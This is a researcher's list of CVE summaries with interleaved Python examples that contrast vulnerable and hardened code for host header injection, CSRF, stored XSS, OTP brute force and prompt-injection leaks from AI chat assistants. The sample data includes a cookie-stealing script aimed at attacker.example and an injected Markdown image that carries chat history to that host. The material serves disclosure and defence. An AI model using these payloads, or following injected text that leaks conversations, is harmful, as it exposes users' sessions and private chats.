Sourajeet Majumder

19 exploits. Active since Aug 2024.
CVE-2024-42914 CRITICAL WRITEUP
ArrowCMS 1.0.0 - Host Header Injection
A host header injection vulnerability exists in the forgot password functionality of ArrowCMS version 1.0.0. By sending a specially crafted host header in the forgot password request, it is possible to send password reset links to users which, once clicked, lead to an attacker-controlled server and thus leak the password reset token. This may allow an attacker to reset other users' passwords.
CVSS 9.1
CVE-2024-42915 HIGH WRITEUP
Staff Appraisal System v1.0 - Host Header Injection
A host header injection vulnerability in Staff Appraisal System v1.0 allows attackers to obtain the password reset token via user interaction with a crafted password reset link. This will allow attackers to arbitrarily reset other users' passwords and compromise their accounts.
CVSS 8.0
CVE-2024-45979 HIGH WRITEUP
Lines Police CAD 1.0 - Host Header Injection
A host header injection vulnerability in Lines Police CAD 1.0 allows attackers to obtain the password reset token via user interaction with a crafted password reset link. This allows attackers to arbitrarily reset other users' passwords and compromise their accounts.
CVSS 8.8
CVE-2024-45980 HIGH WRITEUP
MEANStore 1.0 - Host Header Injection
A host header injection vulnerability in MEANStore 1.0 allows attackers to obtain the password reset token via user interaction with a crafted password reset link. This allows attackers to arbitrarily reset other users' passwords and compromise their accounts.
CVSS 8.8
CVE-2024-45981 HIGH WRITEUP
BookReviewLibrary 1.0 - Host Header Injection
A host header injection vulnerability in BookReviewLibrary 1.0 allows attackers to obtain the password reset token via user interaction with a crafted password reset link.
CVSS 8.8
CVE-2024-45982 HIGH WRITEUP
scheduleR <0.0.18 - Host Header Injection
A host header injection vulnerability in scheduleR v0.0.18 allows attackers to obtain the password reset token via user interaction with a crafted password reset link. This allows attackers to arbitrarily reset other users' passwords and compromise their accounts.
CVSS 8.8
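The six entries above share one root cause: the password reset handler builds the link it mails from the request's Host header, so a request carrying "Host: attacker.example" produces a link whose host the attacker controls, and the token leaks when the victim clicks it. The following is an added example, not code from any of the affected projects or from the writeups; the allowlist, the canonical origin and the function names are assumptions made for illustration. It shows the vulnerable construction beside the hardened one, which refuses requests for hosts the application does not serve and never derives the public origin from request data.

```python
import secrets
from typing import Optional
from urllib.parse import urlsplit

# Hypothetical deployment configuration (constructed for this example).
ALLOWED_HOSTS = {"cms.example.com", "www.cms.example.com"}
CANONICAL_ORIGIN = "https://cms.example.com"


def build_reset_link_vulnerable(headers: dict, token: str) -> str:
    """The vulnerable pattern: the link's host is copied from the request.
    A request with 'Host: attacker.example' makes the mailed link point at
    the attacker's server, which receives the token when the user clicks."""
    host = headers.get("Host", "")
    return f"https://{host}/reset-password?token={token}"


def host_is_allowed(host_header: str) -> bool:
    """Compare the Host header against the allowlist, ignoring an optional
    port and letter case. (Bracketed IPv6 literals are not handled here.)"""
    host = host_header.split(":", 1)[0].strip().lower()
    return host in ALLOWED_HOSTS


def build_reset_link_hardened(headers: dict, token: str) -> Optional[str]:
    """The fix: refuse requests for hosts the application does not serve, and
    build the link from configuration rather than from any request header.
    Returns None when the caller should answer 400 and send no mail."""
    if not host_is_allowed(headers.get("Host", "")):
        return None
    # X-Forwarded-Host is deliberately not consulted; a reverse proxy that
    # sets it must enforce the same allowlist before the request reaches us.
    return f"{CANONICAL_ORIGIN}/reset-password?token={token}"


def link_host(link: str) -> str:
    """Host that a mailed link would deliver the token to."""
    return urlsplit(link).hostname or ""


if __name__ == "__main__":
    token = secrets.token_urlsafe(32)
    crafted = {"Host": "attacker.example"}
    print("vulnerable:", build_reset_link_vulnerable(crafted, token))
    print("hardened:  ", build_reset_link_hardened(crafted, token))
    print("hardened:  ", build_reset_link_hardened({"Host": "cms.example.com:443"}, token))
```

When testing an application for this class of bug, send the forgot-password request twice, once with a bogus Host header and once with the same value in X-Forwarded-Host, and inspect the link that arrives in the mailbox; either variant reaching the mail is the finding.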
CVE-2024-45983 MEDIUM WRITEUP
Kishan0725 Hospital Management System - CSRF
A Cross-Site Request Forgery (CSRF) vulnerability exists in kishan0725's Hospital Management System version 6.3.5. The vulnerability allows an attacker to craft a malicious HTML form that submits a request to delete a doctor record. By enticing an authenticated admin user to visit the specially crafted web page, the attacker can leverage the victim's browser to make unauthorized requests to the vulnerable endpoint, effectively allowing the attacker to perform actions on behalf of the admin without their consent.
CVSS 6.3
CVE-2024-45984 MEDIUM WRITEUP
Varunsardana004 Blood Bank And Donation Management System - XSS
A Cross Site Scripting (XSS) vulnerability in add_donor.php of Blood Bank And Donation Management System 1.0 allows an attacker to inject malicious scripts that will be executed when the Donor List is viewed.
CVSS 4.7
CVE-2024-45985 MEDIUM WRITEUP
Varunsardana004 Blood Bank And Donation Management System - XSS
A Cross Site Scripting (XSS) vulnerability in update_contact.php of Blood Bank and Donation Management System v1.0 allows an attacker to inject malicious scripts via the name parameter of update_contact.php.
CVSS 4.7
CVE-2024-45986 MEDIUM WRITEUP
Projectworlds Online Voting System Project - XSS
A stored Cross-Site Scripting (XSS) vulnerability was identified in Projectworld Online Voting System 1.0: an account registered with a malicious JavaScript payload stores that payload, which is then executed in the voter.php and profile.php pages whenever the account information is accessed.
CVSS 5.4
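The three stored XSS entries above follow the same shape: a value accepted at one endpoint (add_donor.php, update_contact.php, account registration) is later written into a page unencoded, so the browser of whoever views the list or profile runs it. The block below is an added example, not code from the affected projects or from the writeups; the donor records and field names are constructed sample data. It renders the same table twice, once with raw interpolation and once with output encoding that is safe in both element text and quoted attributes, and checks which rendering still carries live markup.

```python
import html

# Constructed sample records (not from the project): the second donor's fields
# carry payloads of the kind stored through add_donor.php / update_contact.php.
DONORS = [
    {"name": "Asha Rao", "blood_group": "O+", "contact": "555-0101"},
    {
        "name": '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
        "blood_group": "A-",
        "contact": '" onmouseover="alert(1)',
    },
]


def render_row_vulnerable(d: dict) -> str:
    """Stored values interpolated straight into markup: the script tag in the
    name runs, and the contact value breaks out of its attribute."""
    return (
        f'<tr><td>{d["name"]}</td><td>{d["blood_group"]}</td>'
        f'<td data-contact="{d["contact"]}">{d["contact"]}</td></tr>'
    )


def esc(value) -> str:
    # quote=True also encodes " and ', so the result is inert inside a
    # quoted attribute as well as in element text.
    return html.escape(str(value), quote=True)


def render_row_hardened(d: dict) -> str:
    """Same template, every stored value encoded at the point of output."""
    return (
        f'<tr><td>{esc(d["name"])}</td><td>{esc(d["blood_group"])}</td>'
        f'<td data-contact="{esc(d["contact"])}">{esc(d["contact"])}</td></tr>'
    )


def render_table(rows, renderer) -> str:
    return "<table>" + "".join(renderer(d) for d in rows) + "</table>"


def contains_active_markup(markup: str) -> bool:
    """Rough check used here: a raw <script> tag or an event handler that
    escaped its attribute survived into the output."""
    lower = markup.lower()
    return "<script" in lower or ' onmouseover="' in lower


if __name__ == "__main__":
    print(render_table(DONORS, render_row_vulnerable))
    print(render_table(DONORS, render_row_hardened))
```

Encoding belongs at the output, chosen for the context being written into; validating the name field on the way in (length, character set) is worth doing but does not replace it, because the same stored value can later be emitted into a different context. A Content-Security-Policy without 'unsafe-inline' limits what a payload that does slip through can execute.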
CVE-2024-45987 MEDIUM WRITEUP
Online Voting System - CSRF
Projectworld Online Voting System Version 1.0 is vulnerable to Cross Site Request Forgery (CSRF) via voter.php. This vulnerability allows an attacker to craft a malicious link that, when clicked by an authenticated user, automatically submits a vote for a specified party without the user's consent or knowledge. The attack leverages the user's active session to perform the unauthorized action, compromising the integrity of the voting process.
CVSS 6.5
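The two CSRF entries (the delete-doctor form in the Hospital Management System and the vote link in voter.php) both rely on the victim's browser attaching its session cookie to a request the attacker composed. The block below is an added example, not code from either project or from the writeups; the request and database shapes, the secret key and the handler names are constructed for illustration. It models a state-changing handler that trusts the cookie alone next to one that requires POST, rejects cross-site requests flagged by Sec-Fetch-Site, and verifies a session-bound token with a constant-time comparison.

```python
import hashlib
import hmac
import secrets

# Per-deployment secret (constructed here; in practice loaded from config).
SECRET_KEY = secrets.token_bytes(32)


def csrf_token_for(session_id: str) -> str:
    """Synchronizer token derived from the session, so a token captured from
    one session is useless in another."""
    return hmac.new(SECRET_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def delete_doctor_vulnerable(req: dict, db: dict) -> int:
    """Any request carrying a valid session deletes the record. A form on an
    attacker page, auto-submitted by the admin's browser, satisfies this."""
    if req["session_id"] not in db["sessions"]:
        return 401
    db["doctors"].discard(req["params"].get("id"))
    return 200


def delete_doctor_hardened(req: dict, db: dict) -> int:
    if req["session_id"] not in db["sessions"]:
        return 401
    if req["method"] != "POST":
        return 405  # state changes never ride on a GET link (cf. voter.php)
    # Fetch metadata: browsers label cross-site requests; refuse them outright.
    # When the header is absent (older clients) we fall through to the token.
    if req["headers"].get("Sec-Fetch-Site", "same-origin") not in ("same-origin", "none"):
        return 403
    expected = csrf_token_for(req["session_id"])
    supplied = req["params"].get("csrf_token", "")
    if not hmac.compare_digest(expected, supplied):
        return 403
    db["doctors"].discard(req["params"].get("id"))
    return 200


def make_db() -> dict:
    # Constructed state: one logged-in admin session and two doctor records.
    return {"sessions": {"s-admin"}, "doctors": {"d1", "d2"}}


def forged_request() -> dict:
    """What an auto-submitted form on attacker.example produces: the admin's
    cookie rides along, but there is no token and the fetch metadata says
    cross-site."""
    return {
        "method": "POST",
        "session_id": "s-admin",
        "headers": {"Origin": "https://attacker.example", "Sec-Fetch-Site": "cross-site"},
        "params": {"id": "d1"},
    }


def legitimate_request() -> dict:
    return {
        "method": "POST",
        "session_id": "s-admin",
        "headers": {"Sec-Fetch-Site": "same-origin"},
        "params": {"id": "d1", "csrf_token": csrf_token_for("s-admin")},
    }


if __name__ == "__main__":
    db = make_db()
    print("vulnerable handler, forged request:", delete_doctor_vulnerable(forged_request(), db), db["doctors"])
    db = make_db()
    print("hardened handler, forged request:  ", delete_doctor_hardened(forged_request(), db), db["doctors"])
    print("hardened handler, real request:    ", delete_doctor_hardened(legitimate_request(), db), db["doctors"])
```

Setting the session cookie with SameSite=Lax (the default in current Chromium-based browsers) would already stop the cross-site POST in this scenario, but it does not stop the GET-based vote in voter.php, which is why the handler above refuses to change state on GET at all.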
CVE-2024-45989 MEDIUM WRITEUP
Monica AI Assistant desktop app <2.3.0 - Info Disclosure
Monica AI Assistant desktop application v2.3.0 is vulnerable to Exposure of Sensitive Information to an Unauthorized Actor. A prompt injection allows an attacker to alter the chatbot's answer so that it embeds an image whose URL points to a malicious third-party or attacker-controlled server; when the client renders the answer and fetches the image, the user's sensitive chat data from the current session is sent to that server.
CVSS 4.0
CVE-2024-48140 HIGH WRITEUP
Monica Your AI Copilot <6.3.0 - Code Injection
A prompt injection vulnerability in the chatbox of Butterfly Effect Limited Monica Your AI Copilot powered by ChatGPT4 v6.3.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 7.5
CVE-2024-48141 HIGH WRITEUP
Zhipu AI CodeGeeX <2.17.0 - Info Disclosure
A prompt injection vulnerability in the chatbox of Zhipu AI CodeGeeX v2.17.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 7.5
CVE-2024-48142 HIGH WRITEUP
Monica ChatGPT AI Assistant <2.4.0 - Code Injection
A prompt injection vulnerability in the chatbox of Butterfly Effect Limited Monica ChatGPT AI Assistant v2.4.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 7.5
CVE-2024-48143 CRITICAL WRITEUP
Digitory Multi Channel Integrated POS v1.0 - Info Disclosure
A lack of rate limiting in the OTP validation component of Digitory Multi Channel Integrated POS v1.0 allows attackers to guess one-time passwords through repeated attempts, gain access to the ordering system and place an excessive number of food orders.
CVSS 9.1
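A short numeric OTP only protects anything if the number of guesses per code is bounded. The block below is an added example, not code from Digitory or from the writeup; the class, the limits and the six-digit code are assumptions made for illustration. It puts an unbounded verifier next to one that counts failures per account, invalidates the code and locks the account after a small number of wrong guesses, and then runs the same enumeration against both.

```python
import hmac
import time

MAX_ATTEMPTS = 5          # wrong guesses allowed per issued code (assumed policy)
LOCKOUT_SECONDS = 300     # account lockout after the limit is hit (assumed policy)


class OtpVerifier:
    def __init__(self, clock=time.monotonic):
        self._clock = clock           # injectable for deterministic tests
        self._issued = {}             # account -> (otp, expiry timestamp)
        self._failures = {}           # account -> wrong guesses for the current code
        self._locked_until = {}       # account -> timestamp

    def issue(self, account: str, otp: str, ttl: int = 300) -> None:
        self._issued[account] = (otp, self._clock() + ttl)
        self._failures.pop(account, None)

    def verify_vulnerable(self, account: str, candidate: str) -> bool:
        """No attempt counting: a 6-digit code falls to at most 10^6 requests,
        and the code stays valid for every one of them."""
        issued = self._issued.get(account)
        return issued is not None and issued[0] == candidate

    def verify(self, account: str, candidate: str) -> str:
        """Returns 'ok', 'wrong', 'expired' or 'locked'."""
        now = self._clock()
        if self._locked_until.get(account, 0) > now:
            return "locked"
        issued = self._issued.get(account)
        if issued is None or issued[1] < now:
            return "expired"
        if hmac.compare_digest(issued[0].encode(), candidate.encode()):
            self._issued.pop(account)          # single use
            self._failures.pop(account, None)
            return "ok"
        count = self._failures.get(account, 0) + 1
        self._failures[account] = count
        if count >= MAX_ATTEMPTS:
            # Invalidate the code as well: a lockout alone only slows the
            # enumeration, it does not end it.
            self._issued.pop(account, None)
            self._failures.pop(account, None)
            self._locked_until[account] = now + LOCKOUT_SECONDS
            return "locked"
        return "wrong"


def brute_force(verifier: OtpVerifier, account: str, method, digits: int = 6):
    """Enumerate every code in order; returns (outcome, attempts used)."""
    attempts = 0
    for guess in range(10 ** digits):
        attempts += 1
        result = method(account, f"{guess:0{digits}d}")
        if result is True or result == "ok":
            return ("ok", attempts)
        if result in ("locked", "expired"):
            return (result, attempts)
    return ("exhausted", attempts)


if __name__ == "__main__":
    v = OtpVerifier()
    v.issue("order-42", "004217")
    print("unbounded:", brute_force(v, "order-42", v.verify_vulnerable))
    v.issue("order-42", "004217")
    print("limited:  ", brute_force(v, "order-42", v.verify))
```

Per-account counting is the minimum; a deployment should also throttle by client address and watch for many accounts receiving a few guesses each, which is how an attacker spreads the budget when the per-account limit is in place.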
CVE-2024-48144 CRITICAL WRITEUP
Fusion Chat Chat AI Assistant Ask Me Anything <1.2.4.0 - Info Discl...
A prompt injection vulnerability in the chatbox of Fusion Chat Chat AI Assistant Ask Me Anything v1.2.4.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 9.1
CVE-2024-48145 CRITICAL WRITEUP
ChatNet AI <v1.0 - Info Disclosure
A prompt injection vulnerability in the chatbox of Netangular Technologies ChatNet AI Version v1.0 allows attackers to access and exfiltrate all previous and subsequent chat data between the user and the AI assistant via a crafted message.
CVSS 9.1
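The prompt-injection entries above (Monica, CodeGeeX, Fusion Chat, ChatNet AI) describe the same exfiltration channel: the injected instructions make the model emit a Markdown image whose URL carries the conversation, and the chat client fetches it without any user action. The block below is an added example, not code from any of those products or from the writeups; the allowlisted CDN host, the sample conversation and the function names are constructed for illustration. It builds the kind of reply a successful injection produces, then runs it through an output filter that lets only images from an allowlisted host through and replaces everything else with its alt text, so the client never issues the request.

```python
import re
from urllib.parse import quote, urlsplit

# Hosts the chat client is permitted to load images from (assumed configuration).
ALLOWED_IMAGE_HOSTS = {"cdn.assistant.example"}

# Markdown image syntax ![alt](url ...) and raw <img> tags the model might emit.
_MD_IMAGE = re.compile(r"!\[([^\]]*)\]\(([^)\s]+)[^)]*\)")
_HTML_IMG = re.compile(r"<img\b[^>]*>", re.IGNORECASE)


def injected_reply(chat_history: list) -> str:
    """Constructed example of what a successful injection makes the model say:
    the prior conversation is URL-encoded into an image on the attacker's host."""
    leak = quote(" | ".join(chat_history))
    return f"Sure, here is the summary.\n\n![loading](https://attacker.example/c?d={leak})"


def render_vulnerable(assistant_markdown: str) -> str:
    """The vulnerable client: model output goes straight to the Markdown renderer,
    which fetches every image URL as soon as the message is displayed."""
    return assistant_markdown


def sanitize_assistant_output(md: str):
    """Return (clean_markdown, blocked_urls). Images are kept only when served
    over https from an allowlisted host; raw <img> tags are never rendered."""
    blocked = []

    def keep_or_strip(match):
        alt, url = match.group(1), match.group(2)
        parts = urlsplit(url)
        host = (parts.hostname or "").lower()
        if parts.scheme == "https" and host in ALLOWED_IMAGE_HOSTS:
            return match.group(0)
        blocked.append(url)
        return f"[image removed: {alt}]"

    clean = _MD_IMAGE.sub(keep_or_strip, md)
    blocked.extend(_HTML_IMG.findall(clean))
    clean = _HTML_IMG.sub("[image removed]", clean)
    return clean, blocked


if __name__ == "__main__":
    history = ["user: my API key is sk-test-123", "assistant: noted"]
    reply = injected_reply(history)
    print("rendered by vulnerable client:\n", render_vulnerable(reply))
    clean, blocked = sanitize_assistant_output(reply)
    print("rendered by hardened client:\n", clean)
    print("blocked:", blocked)
```

Output filtering in the application is one layer; the client's Content-Security-Policy img-src directive should enforce the same allowlist so a rendering bug cannot reopen the channel. Markdown links to non-allowlisted hosts carry the same data but need a click, and deserve the same treatment.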
CVE-2024-55272 HIGH WRITEUP
Brainasoft Braina <2.8 - Info Disclosure
An issue in Brainasoft Braina v2.8 allows a remote attacker to obtain sensitive information via the chat window function.
CVSS 7.5